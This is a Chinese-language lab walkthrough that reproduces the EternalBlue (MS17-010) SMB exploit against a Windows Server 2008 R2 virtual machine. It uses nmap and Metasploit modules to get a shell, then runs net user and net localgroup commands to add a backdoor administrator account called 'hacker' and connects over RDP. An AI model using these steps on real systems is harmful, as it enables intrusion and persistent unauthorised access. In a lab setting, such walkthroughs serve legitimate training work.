永恒之蓝漏洞复现

永恒之蓝漏洞复现
Att@ckxuEternalBlue(在微软的MS17-010中被修复)是在Windows的SMB服务处理SMB v1请求时发生的漏洞,这个漏洞导致攻击者在目标系统上可以执行任意代码。
准备工作
攻击机(kali)ip:192.168.174.130
靶机(windows server 2008 R2)ip:192.168.174.138
工具:kali自带的metasploit(msf)、nmap
利用ms17-010漏洞,靶机必须同时开启139和445端口
漏洞复现
获取ip地址
获取靶机ip地址
ipconfig |
靶机ip地址为:192.168.174.138
获取攻击机ip地址
ifconfig |
攻击机ip地址为:192.168.174.130
这里windows7虚拟机和kali都为net模式,在同一C段
测试连接看能否ping通
ping 靶机ip |
ping不同的情况大概率为Windows防火墙问题,要关闭Windows防火墙(不关闭防火墙nmap扫描不到其端口,MSF利用不了永恒之蓝漏洞)
端口扫描
Windows查看是否开启139和445端口
netstat -ano | findstr "139" |
139和445端口都为listening状态,说明靶机开启了139和445端口
kali中nmap对靶机进行端口扫描
nmap 靶机ip |
发现开启了139和445端口
kali使用msf进行端口扫描
msfconsole(启用msf) |
发现开启了139和445端口
msf进行漏洞利用
msf搜索永恒之蓝漏洞
msfconsole |
有五个可以利用的模块
模块3是一个检测是否存在ms17-010的模块,使用模块3对靶机进行漏洞检测,使用show options 查看参数
use 3 |
显示主机需要设置,且这里为空,我们设置主机
set rhosts 192.168.174.138 |
run开始攻击
run |
存在漏洞
接下来使用模块0进行攻击
use 0 |
攻击成功
输入shell就可以获得靶机权限
提权
创建一个用户,切记密码复杂度达到符合windows安全验证的密码。才可创建成功。
这里创建用户hacker,密码为A#123456
net user hacker A#123456 /add |
将创建好的用户拉进超级管理组
net localgroup Administrators hacker /add |
查看超级管理组中存在hacker
后续使用本机远程桌面连接
在windows本机win+R 输入mstsc,启用远程连接目标靶机,连接我们创建的hacker用户即可